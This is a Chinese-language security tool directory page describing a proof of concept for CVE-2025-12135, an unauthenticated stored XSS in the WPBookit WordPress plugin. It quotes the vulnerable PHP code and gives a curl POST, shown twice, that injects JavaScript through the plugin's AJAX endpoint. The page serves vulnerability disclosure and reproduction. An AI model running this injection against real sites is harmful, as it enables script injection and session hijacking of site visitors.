Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-12135 — WPBookit <= 1.0.6 - 未认证存储型跨站脚本 | Kitploit
工具/GitHubGitHub/d0n601/cve-2025-12135
静态代码分析 (SAST)漏洞分析代码分析Web应用程序漏洞利用身份验证错误配置
GitHubd0n601/cve-2025-12135

CVE-2025-12135

WPBookit <= 1.0.6 - 未认证存储型跨站脚本

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WPBookit <= 1.0.6 - 未认证存储型跨站脚本(XSS)

WPBookit 插件未验证用户权限,也未对其 save_custome_code AJAX 端点中的自定义 CSS/JS 代码进行净化处理,从而允许未认证攻击者注入任意 JavaScript,该脚本会在每次页面加载时执行,导致存储型 XSS 和潜在的会话劫持。

TL;DR 漏洞利用

root@kitploit:~
# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"

详细信息

该漏洞存在于 WPB_Setting_Controller 类的 save_custome_code 方法中。该插件为未认证用户注册了 AJAX 端点,允许任何访客注入任意 CSS/JS 代码,这些代码会在每次页面加载时执行。

漏洞代码 来自 /core/admin/classes/controllers/class.wpb-setting-controller.php:16-25:

root@kitploit:~
public function save_custome_code(WP_REST_Request $request){
    $css_code= $request->get_param('css_code');
    $js_code= $request->get_param('js_code');
    update_option( 'wpb_custom_code_data', [  'css_code' => $css_code,  'js_code' => $js_code ]);
}

代码执行 来自 /core/shortcodes/class-wpbookit-shortcode-abstract.php:20-27:

root@kitploit:~
$wpb_custom_code= get_option( 'wpb_custom_code_data', [  'css_code' => '',  'js_code' => '' ]);

wp_add_inline_style( 'wpb-custom-code-css', stripslashes($wpb_custom_code['css_code']));
wp_add_inline_script( 'wpb-custom-code-js', stripslashes($wpb_custom_code['js_code']) );

未认证访问 来自 /core/admin/classes/class.wpb-admin-routes-handler.php:15-16:

root@kitploit:~
add_action( "wp_ajax_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
add_action( "wp_ajax_nopriv_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );

路由配置 来自 /core/admin/classes/class.wpb-admin-routes.php:118-123:

root@kitploit:~
'save_custome_code' => [
    'method' => 'post',
    'action' => 'WPB_Setting_Controller@save_custome_code',
    'nonce' => 0,
    'module' => 'setting-controller'
],

手动复现

  1. 识别目标 — 安装了 WPBookit 插件的站点
  2. 注入恶意 JavaScript:
root@kitploit:~
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"
  1. 验证注入 — 访问站点上的任意页面,将触发 alert 弹窗
  2. 检查持久化 — 恶意代码存储在数据库中,并在每次页面加载时执行
下载工具